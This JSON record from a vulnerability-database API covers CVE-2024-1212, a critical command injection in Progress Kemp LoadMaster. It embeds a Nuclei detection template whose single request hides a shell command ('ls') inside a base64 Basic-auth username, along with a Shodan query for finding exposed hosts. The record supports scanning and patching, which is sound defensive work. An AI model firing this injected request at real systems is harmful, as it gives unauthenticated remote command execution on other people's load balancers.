{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-1212/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-1212/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-1212/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-1212/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-1212/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-1212"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-1212"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-1212.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2024-1212\n\ninfo:\n  name: Progress Kemp LoadMaster - Command Injection\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n  impact: |\n    Unauthenticated attackers can execute arbitrary system commands through the LoadMaster management interface, leading to complete system compromise.\n  remediation: |\n    Upgrade to LoadMaster versions 7.2.59.2, 7.2.54.8, or 7.2.48.10 depending on your current version.\n  reference:\n    - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster\n    - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212\n    - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-1212\n    - https://freeloadbalancer.com/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10\n    cve-id: CVE-2024-1212\n    cwe-id: CWE-78\n    epss-score: 0.95388\n    epss-percentile: 0.99867\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"LoadMaster\"\n  tags: cve,cve2024,progress,rce,loadmaster,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/access/set?param=enableapi&value=1\"\n    headers:\n      Authorization: \"Basic JztsczsnOmRvZXNub3RtYXR0ZXI=\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"bin\"\n          - \"mnt\"\n          - \"WWW-Authenticate: Basic\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100e3143f0aeef1a14c27f0894ed6b08c84f1140bfef187c06217e09bb62fda8329022100f871f8782eef039e63ec594ec34607e5998573d3a46eb0303b2296096edbe153:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-1212"
}